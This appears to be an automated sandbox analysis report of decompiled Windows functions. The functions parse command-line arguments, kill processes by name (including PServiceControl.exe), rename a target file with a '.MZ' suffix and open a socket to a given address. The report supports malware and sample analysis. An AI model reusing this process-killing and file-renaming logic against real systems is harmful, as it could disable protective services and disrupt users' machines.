									_t474 = E00A43A90(_v24,  *((intOrPtr*)(_v24 + 0xc)),  *((intOrPtr*)(_v24 + 0xc)), 0xa49c60);
									_t747 = _t746 + 8;
									__eflags = _t474;
									if(_t474 != 0) {
										L28:
										__eflags = _v8 - _v20;
										if(_v8 >= _v20) {
											L31:
											_v12 = 0;
											L32:
											_t476 = E00A43A90(_v24,  *((intOrPtr*)(_v24 + 0x18)),  *((intOrPtr*)(_v24 + 0x18)), 0xa49c64);
											_t748 = _t747 + 8;
											__eflags = _t476;
											if(_t476 != 0) {
												L69:
												__eflags = _v8 - _v20;
												if(_v8 >= _v20) {
													L72:
													_v28 = 0x680f;
													_v12 = 0;
													L73:
													__eflags = _v8 - _v20;
													if(_v8 >= _v20) {
														L76:
														_v28 = 0x6810;
														_v12 = 0;
														L77:
														_t479 = E00A43E50(_v24, _v36);
														__eflags = _t479 - 0x6800;
														if(_t479 == 0x6800) {
															__eflags = _v48;
															if(_v48 == 0) {
																L134:
																E00A43CB0(_v24);
																__eflags = _v12;
																if(_v12 == 0) {
																	L137:
																	_push(_v28);
																	E00A43A00(__eflags, E00A436C0(_v28), " T%d %h\n", _v8);
																	_t746 = _t748 + 0x10;
																	goto L138;
																}
																_t595 = _v36;
																__eflags =  *(_t595 + 0x10018) & 0x000000ff;
																if(( *(_t595 + 0x10018) & 0x000000ff) != 0) {
																	goto L137;
																}
																_push(_v28);
																_t485 = E00A436C0(_v8); // executed
																E00A43A00(__eflags, _t485, " T%d %08x\n", _v8); // executed
																_t746 = _t748 + 0x10;
																E00A47720(__eflags, _v36); // executed
																E00A42AC0( *0xa4b05c, E00A44620, _v36, 0xa); // executed
																goto L138;
															}
															_v40 = 0;
															__eflags = _v8 - _v20;
															if(_v8 >= _v20) {
																L83:
																_v12 = 0;
																L84:
																__eflags = _v40;
																if(_v40 > 0) {
																	E00A41E10(_v36, _v40);
																}
																_v44 = 0;
																while(1) {
																	__eflags = _v44 - _v40;
																	if(_v44 >= _v40) {
																		goto L134;
																	}
																	_v84 = 0;
																	_v72 = 0;
																	_v68 = 0;
																	_v64 = 0;
																	_v80 = 0;
																	_v76 = 0;
																	__eflags = _v8 - _v20;
																	if(_v8 >= _v20) {
																		L92:
																		_v12 = 0;
																		L93:
																		__eflags = _v8 - _v20;
																		if(_v8 >= _v20) {
																			L99:
																			_v12 = 0;
																			L100:
																			__eflags = _v8 - _v20;
																			if(_v8 >= _v20) {
																				L106:
																				_v12 = 0;
																				L107:
																				__eflags = _v8 - _v20;
																				if(_v8 >= _v20) {
																					L113:
																					_v12 = 0;
																					L114:
																					__eflags = _v8 - _v20;
																					if(_v8 >= _v20) {
																						L117:
																						_v12 = 0;
																						L118:
																						__eflags = _v8 - _v20;
																						if(_v8 >= _v20) {
																							L121:
																							_v12 = 0;
																							L122:
																							__eflags = _v12;
																							if(_v12 != 0) {
																								__eflags = _v64;
																								if(_v64 == 0) {
																									_v31 = 0;
																								} else {
																									_v31 = 1;
																								}
																								__eflags = _v68;
																								if(_v68 == 0) {
																									_v29 = 0;
																								} else {
																									_v29 = 1;
																								}
																								__eflags = _v72;
																								if(_v72 == 0) {
																									_v30 = 0;
																								} else {
																									_v30 = 1;
																								}
																								E00A41EE0(_v36, _v84, _v30 & 0x000000ff, _v29 & 0x000000ff, _v31 & 0x000000ff, _v80, _v76);
																							}
																							_t601 = _v44 + 1;
																							__eflags = _t601;
																							_v44 = _t601;
																							continue;
																						}
																						__eflags = _v12;
																						if(_v12 == 0) {
																							goto L121;
																						}
																						_v220 =  *((intOrPtr*)(_v16 + _v8 * 4));
																						_v224 = E00A43360(_v220);
																						_v76 = StrToIntA(_v224);
																						_v8 = _v8 + 1;
																						goto L122;
																					}
																					__eflags = _v12;
																					if(_v12 == 0) {
																						goto L117;
																					}
																					_v212 =  *((intOrPtr*)(_v16 + _v8 * 4));
																					_v216 = E00A43360(_v212);
																					_v80 = StrToIntA(_v216);
																					_v8 = _v8 + 1;
																					goto L118;
																				}
																				__eflags = _v12;
																				if(_v12 == 0) {
																					goto L113;
																				}
																				_v200 =  *((intOrPtr*)(_v16 + _v8 * 4));
																				_t505 = E00A43360(_v200); // executed
																				_v204 = _t505;
																				_v208 = StrToIntA(_v204);
																				_v8 = _v8 + 1;
																				__eflags = _v208 - 1;
																				if(_v208 != 1) {
																					_v60 = 0;
																				} else {
																					_v60 = 1;
																				}
																				_v64 = _v60;
																				goto L114;
																			}
																			__eflags = _v12;
																			if(_v12 == 0) {
																				goto L106;
																			}
																			_v188 =  *((intOrPtr*)(_v16 + _v8 * 4));
																			_v192 = E00A43360(_v188);
																			_v196 = StrToIntA(_v192);
																			_v8 = _v8 + 1;
																			__eflags = _v196 - 1;
																			if(_v196 != 1) {
																				_v56 = 0;
																			} else {
																				_v56 = 1;
																			}
																			_v68 = _v56;
																			goto L107;
																		}
																		__eflags = _v12;
																		if(_v12 == 0) {
																			goto L99;
																		}
																		_v176 =  *((intOrPtr*)(_v16 + _v8 * 4));
																		_v180 = E00A43360(_v176);
																		_v184 = StrToIntA(_v180);
																		_v8 = _v8 + 1;
																		__eflags = _v184 - 1;
																		if(_v184 != 1) {
																			_v52 = 0;
																		} else {
																			_v52 = 1;
																		}
																		_v72 = _v52;
																		goto L100;
																	}
																	__eflags = _v12;
																	if(_v12 == 0) {
																		goto L92;
																	}
																	_v168 =  *((intOrPtr*)(_v16 + _v8 * 4));
																	_v172 = E00A43360(_v168);
																	_v84 = StrToIntA(_v172);
																	_v8 = _v8 + 1;
																	goto L93;
																}
																goto L134;
															}
															__eflags = _v12;
															if(_v12 == 0) {
																goto L83;
															}
															_v160 =  *((intOrPtr*)(_v16 + _v8 * 4));
															_v164 = E00A43360(_v160);
															_v40 = StrToIntA(_v164);
															_v8 = _v8 + 1;
															goto L84;
														}
														goto L134;
													}
													__eflags = _v12;
													if(_v12 == 0) {
														goto L76;
													}
													_v156 =  *((intOrPtr*)(_v16 + _v8 * 4));
													 *((intOrPtr*)(_v24 + 0x44)) = E00A43360(_v156);
													_v8 = _v8 + 1;
													goto L77;
												}
												__eflags = _v12;
												if(_v12 == 0) {
													goto L72;
												}
												_v152 =  *((intOrPtr*)(_v16 + _v8 * 4));
												 *((intOrPtr*)(_v24 + 0x40)) = E00A43360(_v152);
												_v8 = _v8 + 1;
												goto L73;
											}
											__eflags = _v8 - _v20;
											if(_v8 >= _v20) {
												L36:
												_v28 = 0x6808;
												_v12 = 0;
												L37:
												__eflags = _v8 - _v20;
												if(_v8 >= _v20) {
													L40:
													_v28 = 0x6809;
													_v12 = 0;
													L41:
													__eflags = _v8 - _v20;
													if(_v8 >= _v20) {
														L44:
														_v28 = 0x680a;
														_v12 = 0;
														L45:
														__eflags = _v8 - _v20;
														if(_v8 >= _v20) {
															L48:
															_v28 = 0x6801;
															_v12 = 0;
															L49:
															__eflags = _v8 - _v20;
															if(_v8 >= _v20) {
																L52:
																_v28 = 0x680b;
																_v12 = 0;
																L53:
																__eflags = _v8 - _v20;
																if(_v8 >= _v20) {
																	L56:
																	_v28 = 0x680c;
																	_v12 = 0;
																	L57:
																	__eflags = _v8 - _v20;
																	if(_v8 >= _v20) {
																		L60:
																		_v28 = 0x680d;
																		_v12 = 0;
																		L61:
																		__eflags = _v8 - _v20;
																		if(_v8 >= _v20) {
																			L64:
																			_v28 = 0x6811;
																			_v12 = 0;
																			L65:
																			__eflags = _v8 - _v20;
																			if(_v8 >= _v20) {
																				L68:
																				_v28 = 0x680e;
																				_v12 = 0;
																				goto L69;
																			}
																			__eflags = _v12;
																			if(_v12 == 0) {
																				goto L68;
																			}
																			_v148 =  *((intOrPtr*)(_v16 + _v8 * 4));
																			 *((intOrPtr*)(_v24 + 0x3c)) = E00A43360(_v148);
																			_v8 = _v8 + 1;
																			goto L69;
																		}
																		__eflags = _v12;
																		if(_v12 == 0) {
																			goto L64;
																		}
																		_v144 =  *((intOrPtr*)(_v16 + _v8 * 4));
																		 *((intOrPtr*)(_v24 + 0x38)) = E00A43360(_v144);
																		_v8 = _v8 + 1;
																		goto L65;
																	}
																	__eflags = _v12;
																	if(_v12 == 0) {
																		goto L60;
																	}
																	_v140 =  *((intOrPtr*)(_v16 + _v8 * 4));
																	 *((intOrPtr*)(_v24 + 0x34)) = E00A43360(_v140);
																	_v8 = _v8 + 1;
																	goto L61;
																}
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L56;
																}
																_v136 =  *((intOrPtr*)(_v16 + _v8 * 4));
																 *((intOrPtr*)(_v24 + 0x30)) = E00A43360(_v136);
																_v8 = _v8 + 1;
																goto L57;
															}
															__eflags = _v12;
															if(_v12 == 0) {
																goto L52;
															}
															_v132 =  *((intOrPtr*)(_v16 + _v8 * 4));
															 *((intOrPtr*)(_v24 + 0x2c)) = E00A43360(_v132);
															_v8 = _v8 + 1;
															goto L53;
														}
														__eflags = _v12;
														if(_v12 == 0) {
															goto L48;
														}
														_v128 =  *((intOrPtr*)(_v16 + _v8 * 4));
														 *((intOrPtr*)(_v24 + 0x28)) = E00A43360(_v128);
														_v8 = _v8 + 1;
														goto L49;
													}
													__eflags = _v12;
													if(_v12 == 0) {
														goto L44;
													}
													_v124 =  *((intOrPtr*)(_v16 + _v8 * 4));
													 *((intOrPtr*)(_v24 + 0x24)) = E00A43360(_v124);
													_v8 = _v8 + 1;
													goto L45;
												}
												__eflags = _v12;
												if(_v12 == 0) {
													goto L40;
												}
												_v120 =  *((intOrPtr*)(_v16 + _v8 * 4));
												 *((intOrPtr*)(_v24 + 0x20)) = E00A43360(_v120);
												_v8 = _v8 + 1;
												goto L41;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												goto L36;
											}
											_v116 =  *((intOrPtr*)(_v16 + _v8 * 4));
											 *((intOrPtr*)(_v24 + 0x1c)) = E00A43360(_v116);
											_v8 = _v8 + 1;
											goto L37;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L31;
										}
										_v112 =  *((intOrPtr*)(_v16 + _v8 * 4));
										 *((intOrPtr*)(_v24 + 0x18)) = E00A43360(_v112);
										_v8 = _v8 + 1;
										goto L32;
									}
									_v48 = 0;
									__eflags = _v8 - _v20;
									if(_v8 >= _v20) {
										L23:
										_v28 = 0x6805;
										_v12 = 0;
										L24:
										__eflags = _v8 - _v20;
										if(_v8 >= _v20) {
											L27:
											_v28 = 0x6806;
											_v12 = 0;
											goto L28;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L27;
										}
										_v108 =  *((intOrPtr*)(_v16 + _v8 * 4));
										 *((intOrPtr*)(_v24 + 0x14)) = E00A43360(_v108);
										_v8 = _v8 + 1;
										goto L28;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L23;
									}
									_v104 =  *((intOrPtr*)(_v16 + _v8 * 4));
									 *((intOrPtr*)(_v24 + 0x10)) = E00A43360(_v104);
									_v8 = _v8 + 1;
									goto L24;
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L18;
								}
								_v100 =  *((intOrPtr*)(_v16 + _v8 * 4));
								 *((intOrPtr*)(_v24 + 0xc)) = E00A43360(_v100);
								_v8 = _v8 + 1;
								goto L19;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L14;
							}
							_v96 =  *((intOrPtr*)(_v16 + _v8 * 4));
							 *((intOrPtr*)(_v24 + 8)) = E00A43360(_v96);
							_v8 = _v8 + 1;
							goto L15;
						}
						__eflags = _v12;
						if(_v12 == 0) {
							goto L10;
						}
						_v92 =  *((intOrPtr*)(_v16 + _v8 * 4));
						 *((intOrPtr*)(_v24 + 4)) = E00A43360(_v92);
						_v8 = _v8 + 1;
						goto L11;
					}
					return LocalFree(_v16);
				}
				return _t460;
			}

0x00a4464d
0x00000000
0x00000000
0x00a44654
0x00a4465b
0x00a44662
0x00a44669
0x00a44670
0x00a44677
0x00a44686
0x00a4468c
0x00a4468f
0x00a44693
0x00a44699
0x00a446a0
0x00a446a3
0x00a446a6
0x00000000
0x00000000
0x00a446af
0x00a446b6
0x00a446be
0x00a446c0
0x00a44fce
0x00000000
0x00a44fce
0x00a446cd
0x00a446d0
0x00a446d4
0x00000000
0x00000000
0x00a446da
0x00a446e6
0x00a446eb
0x00a446ee
0x00a446fe
0x00a4470d
0x00a44715
0x00a4471b
0x00a4471e
0x00a4474c
0x00a4474c
0x00a44753
0x00a4475a
0x00a4475d
0x00a44760
0x00a4478e
0x00a4478e
0x00a44795
0x00a4479c
0x00a4479f
0x00a447a2
0x00a447d0
0x00a447d0
0x00a447d7
0x00a447de
0x00a447ea
0x00a447ef
0x00a447f2
0x00a447f4
0x00a44885
0x00a44888
0x00a4488b
0x00a448b9
0x00a448b9
0x00a448c0
0x00a448cc
0x00a448d1
0x00a448d4
0x00a448d6
0x00a44b46
0x00a44b49
0x00a44b4c
0x00a44b80
0x00a44b80
0x00a44b87
0x00a44b8e
0x00a44b91
0x00a44b94
0x00a44bc8
0x00a44bc8
0x00a44bcf
0x00a44bd6
0x00a44bde
0x00a44be3
0x00a44be8
0x00a44bf4
0x00a44bf8
0x00a44f5a
0x00a44f5e
0x00a44f63
0x00a44f67
0x00a44fb3
0x00a44fb6
0x00a44fc6
0x00a44fcb
0x00000000
0x00a44fcb
0x00a44f69
0x00a44f73
0x00a44f75
0x00000000
0x00000000
0x00a44f7a
0x00a44f84
0x00a44f8a
0x00a44f8f
0x00a44f96
0x00a44fac
0x00000000
0x00a44fac
0x00a44bfe
0x00a44c08
0x00a44c0b
0x00a44c4f
0x00a44c4f
0x00a44c56
0x00a44c56
0x00a44c5a
0x00a44c63
0x00a44c63
0x00a44c68
0x00a44c7a
0x00a44c7d
0x00a44c80
0x00000000
0x00000000
0x00a44c86
0x00a44c8d
0x00a44c94
0x00a44c9b
0x00a44ca2
0x00a44ca9
0x00a44cb3
0x00a44cb6
0x00a44cfa
0x00a44cfa
0x00a44d01
0x00a44d04
0x00a44d07
0x00a44d6d
0x00a44d6d
0x00a44d74
0x00a44d77
0x00a44d7a
0x00a44de0
0x00a44de0
0x00a44de7
0x00a44dea
0x00a44ded
0x00a44e53
0x00a44e53
0x00a44e5a
0x00a44e5d
0x00a44e60
0x00a44ea4
0x00a44ea4
0x00a44eab
0x00a44eae
0x00a44eb1
0x00a44ef5
0x00a44ef5
0x00a44efc
0x00a44efc
0x00a44f00
0x00a44f02
0x00a44f06
0x00a44f0e
0x00a44f08
0x00a44f08
0x00a44f08
0x00a44f12
0x00a44f16
0x00a44f1e
0x00a44f18
0x00a44f18
0x00a44f18
0x00a44f22
0x00a44f26
0x00a44f2e
0x00a44f28
0x00a44f28
0x00a44f28
0x00a44f50
0x00a44f50
0x00a44c74
0x00a44c74
0x00a44c77
0x00000000
0x00a44c77
0x00a44eb3
0x00a44eb7
0x00000000
0x00000000
0x00a44ec2
0x00a44ed4
0x00a44ee7
0x00a44ef0
0x00000000
0x00a44ef0
0x00a44e62
0x00a44e66
0x00000000
0x00000000
0x00a44e71
0x00a44e83
0x00a44e96
0x00a44e9f
0x00000000
0x00a44e9f
0x00a44def
0x00a44df3
0x00000000
0x00000000
0x00a44dfe
0x00a44e0b
0x00a44e10
0x00a44e23
0x00a44e2f
0x00a44e32
0x00a44e39
0x00a44e44
0x00a44e3b
0x00a44e3b
0x00a44e3b
0x00a44e4e
0x00000000
0x00a44e4e
0x00a44d7c
0x00a44d80
0x00000000
0x00000000
0x00a44d8b
0x00a44d9d
0x00a44db0
0x00a44dbc
0x00a44dbf
0x00a44dc6
0x00a44dd1
0x00a44dc8
0x00a44dc8
0x00a44dc8
0x00a44ddb
0x00000000
0x00a44ddb
0x00a44d09
0x00a44d0d
0x00000000
0x00000000
0x00a44d18
0x00a44d2a
0x00a44d3d
0x00a44d49
0x00a44d4c
0x00a44d53
0x00a44d5e
0x00a44d55
0x00a44d55
0x00a44d55
0x00a44d68
0x00000000
0x00a44d68
0x00a44cb8
0x00a44cbc
0x00000000
0x00000000
0x00a44cc7
0x00a44cd9
0x00a44cec
0x00a44cf5
0x00000000
0x00a44cf5
0x00000000
0x00a44c7a
0x00a44c0d
0x00a44c11
0x00000000
0x00000000
0x00a44c1c
0x00a44c2e
0x00a44c41
0x00a44c4a
0x00000000
0x00a44c4a
0x00000000
0x00a44bea
0x00a44b96
0x00a44b9a
0x00000000
0x00000000
0x00a44ba5
0x00a44bba
0x00a44bc3
0x00000000
0x00a44bc3
0x00a44b4e
0x00a44b52
0x00000000
0x00000000
0x00a44b5d
0x00a44b72
0x00a44b7b
0x00000000
0x00a44b7b
0x00a448df
0x00a448e2
0x00a44910
0x00a44910
0x00a44917
0x00a4491e
0x00a44921
0x00a44924
0x00a44952
0x00a44952
0x00a44959
0x00a44960
0x00a44963
0x00a44966
0x00a44994
0x00a44994
0x00a4499b
0x00a449a2
0x00a449a5
0x00a449a8
0x00a449d6
0x00a449d6
0x00a449dd
0x00a449e4
0x00a449e7
0x00a449ea
0x00a44a18
0x00a44a18
0x00a44a1f
0x00a44a26
0x00a44a29
0x00a44a2c
0x00a44a60
0x00a44a60
0x00a44a67
0x00a44a6e
0x00a44a71
0x00a44a74
0x00a44aa8
0x00a44aa8
0x00a44aaf
0x00a44ab6
0x00a44ab9
0x00a44abc
0x00a44af0
0x00a44af0
0x00a44af7
0x00a44afe
0x00a44b01
0x00a44b04
0x00a44b38
0x00a44b38
0x00a44b3f
0x00000000
0x00a44b3f
0x00a44b06
0x00a44b0a
0x00000000
0x00000000
0x00a44b15
0x00a44b2a
0x00a44b33
0x00000000
0x00a44b33
0x00a44abe
0x00a44ac2
0x00000000
0x00000000
0x00a44acd
0x00a44ae2
0x00a44aeb
0x00000000
0x00a44aeb
0x00a44a76
0x00a44a7a
0x00000000
0x00000000
0x00a44a85
0x00a44a9a
0x00a44aa3
0x00000000
0x00a44aa3
0x00a44a2e
0x00a44a32
0x00000000
0x00000000
0x00a44a3d
0x00a44a52
0x00a44a5b
0x00000000
0x00a44a5b
0x00a449ec
0x00a449f0
0x00000000
0x00000000
0x00a449fb
0x00a44a0a
0x00a44a13
0x00000000
0x00a44a13
0x00a449aa
0x00a449ae
0x00000000
0x00000000
0x00a449b9
0x00a449c8
0x00a449d1
0x00000000
0x00a449d1
0x00a44968
0x00a4496c
0x00000000
0x00000000
0x00a44977
0x00a44986
0x00a4498f
0x00000000
0x00a4498f
0x00a44926
0x00a4492a
0x00000000
0x00000000
0x00a44935
0x00a44944
0x00a4494d
0x00000000
0x00a4494d
0x00a448e4
0x00a448e8
0x00000000
0x00000000
0x00a448f3
0x00a44902
0x00a4490b
0x00000000
0x00a4490b
0x00a4488d
0x00a44891
0x00000000
0x00000000
0x00a4489c
0x00a448ab
0x00a448b4
0x00000000
0x00a448b4
0x00a447fa
0x00a44804
0x00a44807
0x00a44835
0x00a44835
0x00a4483c
0x00a44843
0x00a44846
0x00a44849
0x00a44877
0x00a44877
0x00a4487e
0x00000000
0x00a4487e
0x00a4484b
0x00a4484f
0x00000000
0x00000000
0x00a4485a
0x00a44869
0x00a44872
0x00000000
0x00a44872
0x00a44809
0x00a4480d
0x00000000
0x00000000
0x00a44818
0x00a44827
0x00a44830
0x00000000
0x00a44830
0x00a447a4
0x00a447a8
0x00000000
0x00000000
0x00a447b3
0x00a447c2
0x00a447cb
0x00000000
0x00a447cb
0x00a44762
0x00a44766
0x00000000
0x00000000
0x00a44771
0x00a44780
0x00a44789
0x00000000
0x00a44789
0x00a44720
0x00a44724
0x00000000
0x00000000
0x00a4472f
0x00a4473e
0x00a44747
0x00000000
0x00a44747
0x00000000
0x00a44fd7
0x00a44fe0

APIs

CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00A44686

Strings

h, xrefs: 00A44AA8
T%d %08x, xrefs: 00A44F7F
T%d %h, xrefs: 00A44FBB

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ArgvCommandLine
String ID: h$ T%d %08x$ T%d %h
API String ID: 3176063776-1487705185
Opcode ID: 6ed63c6a3e52530efdd1efe20ed1d197e5bf36ee9d5619480f7cdbc4e5264dd4
Instruction ID: cc5a18518350efddaa196a4537fa4eaab61915aa753055442381dd0ece840443
Opcode Fuzzy Hash: 6ed63c6a3e52530efdd1efe20ed1d197e5bf36ee9d5619480f7cdbc4e5264dd4
Instruction Fuzzy Hash: 0E729EB8E00219EFDF14CF94C595BAEBBB2FB88304F248599D405AB241C775AE85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A47720 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A47720(void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v6;
				long _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				long _v36;
				long _t49;
				long _t52;
				int _t76;
				void* _t79;
				intOrPtr _t94;

				_t49 = E00A47920("PServiceControl.exe"); // executed
				_v12 = _t49;
				while(_v12 != 0) {
					if(_v12 != 0) {
						_v28 = OpenProcess(1, 0, _v12);
						TerminateProcess(_v28, 0);
					}
					_v12 = E00A47920(_a4 + 0x10047);
				}
				__eflags = _a4 + 0x10047;
				_t52 = E00A47920(_a4 + 0x10047); // executed
				_v12 = _t52;
				while(1) {
					__eflags = _v12;
					if(_v12 == 0) {
						break;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_v32 = OpenProcess(1, 0, _v12);
						TerminateProcess(_v32, 0);
					}
					_v12 = E00A47920(_a4 + 0x10047);
				}
				_t94 = _a4;
				__eflags =  *(_t94 + 0x10154) & 0x000000ff;
				if(( *(_t94 + 0x10154) & 0x000000ff) != 0) {
					__eflags = _a4 + 0x10155;
					if(_a4 + 0x10155 != 0) {
						_v20 = E00A42420(_t94, 0x100);
						_v16 = E00A42420(_t94, 0x100);
						_v24 = E00A42420(_t94, 0x100);
						E00A42540(_v20, 0x100);
						E00A42540(_v16, 0x100);
						E00A42540(_v24, 0x100);
						E00A41A10(_v20, _a4 + 0x10155);
						E00A41A10(_v16, _a4 + 0x10155);
						E00A45360(_v20, "\\");
						E00A45360(_v16, "\\");
						E00A45360(_v20, _a4 + 0x10047);
						E00A45360(_v16, _a4 + 0x10047);
						E00A45360(_v16, ".MZ");
						_t102 = _v20;
						_t76 = MoveFileA(_v20, _v16); // executed
						__eflags = _t76;
						if(_t76 == 0) {
							_v5 = 0;
						} else {
							_v5 = 1;
						}
						_v6 = _v5;
						_v36 = GetLastError();
						_t79 = E00A436C0(_t102); // executed
						E00A43A00(__eflags, _t79, " RNM %04x \n", _v36); // executed
						E00A424F0(_v20, _v20);
						E00A424F0(_v20, _v16);
						E00A424F0(_v20, _v24);
					}
				}
				return 1;
			}

0x00a4772b
0x00a47730
0x00a47733
0x00a4773d
0x00a4774d
0x00a47756
0x00a47756
0x00a4776b
0x00a4776b
0x00a47773
0x00a47779
0x00a4777e
0x00a47781
0x00a47781
0x00a47785
0x00000000
0x00000000
0x00a47787
0x00a4778b
0x00a4779b
0x00a477a4
0x00a477a4
0x00a477b8
0x00a477b8
0x00a477bd
0x00a477c7
0x00a477c9
0x00a477d2
0x00a477d7
0x00a477e7
0x00a477f4
0x00a47801
0x00a4780d
0x00a4781b
0x00a47829
0x00a4783c
0x00a47851
0x00a47862
0x00a47873
0x00a47889
0x00a4789e
0x00a478af
0x00a478bb
0x00a478bf
0x00a478c5
0x00a478c7
0x00a478cf
0x00a478c9
0x00a478c9
0x00a478c9
0x00a478d6
0x00a478df
0x00a478eb
0x00a478f1
0x00a478fd
0x00a47906
0x00a4790f
0x00a4790f
0x00a477d7
0x00a47919

APIs

Part of subcall function 00A47920: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00A47937

OpenProcess.KERNEL32(00000001,00000000,00000000,-00010047,PServiceControl.exe), ref: 00A47747
TerminateProcess.KERNEL32(?,00000000), ref: 00A47756
OpenProcess.KERNEL32(00000001,00000000,00000000,-00010047,-00010047,PServiceControl.exe), ref: 00A47795
TerminateProcess.KERNEL32(?,00000000), ref: 00A477A4
MoveFileA.KERNEL32 ref: 00A478BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-00010047,PServiceControl.exe), ref: 00A478D9

Strings

RNM %04x , xrefs: 00A478E6
PServiceControl.exe, xrefs: 00A47726
.MZ, xrefs: 00A478A6

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Process$OpenTerminate$CreateErrorFileLastMoveSnapshotToolhelp32
String ID: RNM %04x $.MZ$PServiceControl.exe
API String ID: 2658820715-3642803627
Opcode ID: 5462711f1bcb0253045d0c014cf942e479135493e137004a57d4dabeca78a3aa
Instruction ID: ecf3bc21d82b269bc6f3908db5158c3ddfd127ad314682de599b2fe7c1977823
Opcode Fuzzy Hash: 5462711f1bcb0253045d0c014cf942e479135493e137004a57d4dabeca78a3aa
Instruction Fuzzy Hash: 7251517DE04208BBDB10EBA4DC46BBF7774AFC4304F148458F645AB242D6799994CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A45650 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00A45650(intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				short _v24;
				short _v26;
				char _v28;
				char _v428;
				char* _t25;
				signed int _t28;
				intOrPtr _t30;
				void* _t37;

				_v12 = 0;
				_t25 =  &_v428;
				__imp__#115(0x202, _t25); // executed
				_v12 = _t25;
				_t56 = _v12;
				if(_v12 == 0) {
					E00A42540( &_v28, 0x10);
					_v28 = 2;
					__imp__#9(_a8 & 0x0000ffff);
					_v26 = 2;
					__imp__#11(_a4);
					_v24 = 2;
					_t28 = E00A455F0(2, _a8 & 0x0000ffff, 1, 0x3a98); // executed
					_v8 = _t28;
					__eflags = _v8 - 0xffffffff;
					if(_v8 != 0xffffffff) {
						_t45 = _v8;
						_t30 = E00A454E0(_v8,  &_v28, 0x10, 0x3a98); // executed
						_v12 = _t30;
						__eflags = _v12 - 0xffffffff;
						if(_v12 != 0xffffffff) {
							_push(0x6813);
							E00A43A00(__eflags, E00A436C0(_t45), " %s M%X \n", _a4);
							E00A45430(_v8, _v8, 0x1f4);
							E00A45460(_v8, _v8, 0x1f4);
							return _v8;
						}
						_push(0x6812);
						_t37 = E00A436C0(_t45); // executed
						E00A43A00(__eflags, _t37, " %s M%X \n", _a4); // executed
						_v8 = 0xffffffff;
						return _v8;
					}
					return _t28 | 0xffffffff;
				}
				return E00A43830(_t56, E00A436C0(_v12), "WSA:%d\n", _v12) | 0xffffffff;
			}

0x00a45659
0x00a45660
0x00a4566c
0x00a45672
0x00a45675
0x00a45679
0x00a456a0
0x00a456aa
0x00a456b3
0x00a456b9
0x00a456c1
0x00a456c7
0x00a456d1
0x00a456d6
0x00a456d9
0x00a456dd
0x00a456f2
0x00a456f6
0x00a456fb
0x00a456fe
0x00a45702
0x00a4572c
0x00a45740
0x00a45751
0x00a4575f
0x00000000
0x00a45764
0x00a45704
0x00a45712
0x00a45718
0x00a45720
0x00000000
0x00a45727
0x00000000
0x00a456df
0x00000000

APIs

WSAStartup.WS2_32(00000202,?), ref: 00A4566C
htons.WS2_32(?), ref: 00A456B3
inet_addr.WS2_32(00000000), ref: 00A456C1

Part of subcall function 00A436C0: InterlockedCompareExchange.KERNEL32(00A4B060,00000001,00000000), ref: 00A436CD

Strings

%s M%X , xrefs: 00A45735
%s M%X , xrefs: 00A4570D
WSA:%d, xrefs: 00A4567F

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CompareExchangeInterlockedStartuphtonsinet_addr
String ID: %s M%X $ %s M%X $WSA:%d
API String ID: 2846001439-1165289275
Opcode ID: 81f5f7a65f5d526d5909c485d6c2e027ce366dec9f805e4eb47855855b89193a
Instruction ID: b936dfbe54d91768672dd5bfd87208d76a71c85c9acd62925e94413bb5408bef
Opcode Fuzzy Hash: 81f5f7a65f5d526d5909c485d6c2e027ce366dec9f805e4eb47855855b89193a
Instruction Fuzzy Hash: 2D31A07DE40208FBDB10EFF0CD46AEFB678AF85710F108654B5146B2C2D6759B409B51

Uniqueness

Uniqueness Score: -1.00%

